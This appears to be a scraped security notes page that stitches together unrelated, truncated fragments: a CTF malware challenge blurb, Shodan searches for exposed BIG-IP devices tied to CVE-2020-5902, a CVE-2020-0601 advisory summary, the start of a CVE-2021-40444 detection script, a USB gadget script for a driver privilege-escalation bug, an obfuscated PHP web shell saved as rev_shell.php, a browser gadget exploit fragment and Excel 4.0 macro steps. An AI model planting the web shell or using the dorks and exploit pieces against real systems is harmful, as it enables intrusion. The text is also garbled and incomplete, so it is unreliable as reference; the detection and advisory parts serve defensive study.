joaovarelas

Vaccine Stealer

Information

Challenge Author: extr(LinkedIn)
Download Link: https://drive.google.com/file/d/10XZD5S2FCdPyugSvoIkWD8s3pH20hQS2/view
Solver: 2

Description

An employee's PC at a COVID-19 vaccine manufacturer was infected with a malware.

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀

Shodan Seaarch

title:"Big-IP&reg;" org:"Organization Name"
http.title:"BIG-IP&reg;- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"

🔸LFI

CVE-2020-0601 AKA ChainOfFools OR CurveBall

General

Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

NSA description:
NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.

	# simple script to detect CVE-2021-40444 exploits in DOCX using oletools
	# v0.01 Philippe Lagadec 2021-09-09

	# IMPORTANT NOTE: this script detects the few samples identified so far, by looking for "mhtml:" in remote objects URLs.
	# But it is not confirmed yet if this detection is generic enough, for example if "mhtml:" is not mandatory.
	# Moreover, for now only Office 2007+ files are supported.
	# Detection for other file types (RTF, Office 97-2003, ...) will be implemented later.

	import sys, zipfile
	from oletools import oleobj, ooxml

	# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
	# devices for triggering the vulnerable Windows Driver installer
	# credits for the Windows Driver install vuln: @j0nh4t
	#
	# https://twitter.com/j0nh4t/status/1429049506021138437
	# https://twitter.com/an0n_r0/status/1429263450748895236
	#

	# the script was developed & tested on Android LineageOS 18.1

	#!/bin/bash
	# Creates DISK0.tree, DISK1.tree, DISKx.tree inside each disk, with the output of tree command.
	# After generating the report, it send via email using mail.
	# To add more disks, just add DISK[x]=/full/path to the disk. Just make sure that the array index are sequencial.
	# Why this?
	# With the reports from tree, in case of disk failure, you will know which file got lost and you can recover them, downloading or via backups.
	# GIST: https://gist.github.com/rafaelbiriba/0ee7ca2baec1ef80a878c825295f09e1

	EMAIL_ADDRESS="" # EMAIL_ADDRESS="email@gmail.com" or leave it blank "" to disable email
	DISKS[0]="/srv/dev-disk-by-id-ata-WDC_WD80EMAZ-00WJTA0_ABC123-part1"

	<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

	/*
	* In terminal:
	* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
	* This is how the code will be produced, \xa0\xb8\xba\xab will be
	* treated as constant therefore no " needed. It is also not copyable
	* string because of non-ascii characters
	*
	* Explanation:

	<html>
	<script type="text/goscript">
	package main
	import "fmt"


	func bring_your_own_gadgts(x uint64, y uint64, z uint64, w uint64, v uint64) uint64 {
	var a uint64 = 0xc3050f585a5e5f58;
	var b uint64 = 0xdeadbeefdeadbeef+1
	var c uint64 = 0xdeadbeefdeadbeef+2

	BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL

	1. Open Excel
	2. Click on the active tab
	3. Select "Insérer"
	4. Click on "Macro MS Excel 4.0".
	5. This will create a new worksheet called "Macro1"

	================================================================================
	In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:

	#!/usr/bin/python
	import socket,ssl
	from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
	from websocket import create_connection, WebSocket
	from urlparse import parse_qs
	import argparse
	import os

	LOOP_BACK_PORT_NUMBER = 8000